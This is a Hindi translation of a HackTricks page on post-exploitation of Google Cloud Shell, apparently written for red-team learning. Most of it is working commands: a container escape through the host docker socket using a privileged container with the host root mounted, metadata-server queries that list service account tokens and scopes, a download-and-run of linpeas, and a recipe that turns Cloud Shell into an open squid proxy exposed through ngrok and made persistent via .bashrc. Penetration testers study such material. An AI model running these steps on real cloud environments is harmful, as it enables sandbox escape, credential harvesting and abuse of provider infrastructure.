GCP - Cloud Shell Post Exploitation

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें!

हैकट्रिक्स का समर्थन करने के अन्य तरीके:

क्लाउड शैल

क्लाउड शैल के बारे में अधिक जानकारी के लिए देखें:

pageGCP - Cloud Shell Enum

कंटेनर एस्केप

ध्यान दें कि Google क्लाउड शैल एक कंटेनर के अंदर चलता है, आप आसानी से मेज़बान की ओर बाहर निकल सकते हैं इस तरह:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

यह google द्वारा एक विकल्प माना नहीं जाता है, लेकिन यह आपको उस वातावरण में क्या हो रहा है का एक व्यापक दृश्य प्रदान करता है।

इसके अतिरिक्त, ध्यान दें कि होस्ट से आप एक सेवा खाता टोकन खोज सकते हैं:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

निम्नलिखित स्कोप के साथ:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

लिनपीएस के साथ मेटाडेटा की जांच करें:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

गिथब का उपयोग करने के बाद https://github.com/carlospolop/bf_my_gcp_permissions सेवा खाते के टोकन के साथ कोई अनुमति खोजी नहीं गई...

प्रॉक्सी के रूप में उसका उपयोग करें

यदि आप अपने गूगल क्लाउड शैल इंस्टेंस को प्रॉक्सी के रूप में उपयोग करना चाहते हैं तो निम्नलिखित कमांड चलाने की आवश्यकता है (या उन्हें .bashrc फ़ाइल में डालें):

sudo apt install -y squid

केवल आपको बताने के लिए, Squid एक http प्रॉक्सी सर्वर है। निम्नलिखित सेटिंग्स के साथ एक squid.conf फ़ाइल बनाएं:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

कॉपी करें squid.conf फ़ाइल को /etc/squid

sudo cp squid.conf /etc/squid

अंत में स्क्विड सेवा चलाएं:

sudo service squid start

बाहर से प्रॉक्सी को उपलब्ध करने के लिए ngrok का उपयोग करें:

./ngrok tcp 3128

चलाने के बाद, tcp:// url की कॉपी करें। अगर आप ब्राउज़र से प्रॉक्सी चलाना चाहते हैं तो सुझाव दिया जाता है कि tcp:// हिस्सा और पोर्ट को हटा दें और पोर्ट को अपने ब्राउज़र प्रॉक्सी सेटिंग्स के पोर्ट फ़ील्ड में डालें (squid एक http प्रॉक्सी सर्वर है)।

स्टार्टअप के लिए बेहतर उपयोग के लिए .bashrc फ़ाइल में निम्नलिखित लाइन होनी चाहिए:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

इन निर्देशों को https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key से कॉपी किया गया था। किसी भी प्रकार के सॉफ्टवेयर (डेटाबेस और यहाँ तक कि विंडोज) को क्लाउड शैल में चलाने के लिए अन्य पागल विचारों के लिए उस पेज की जाँच करें।

शून्य से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated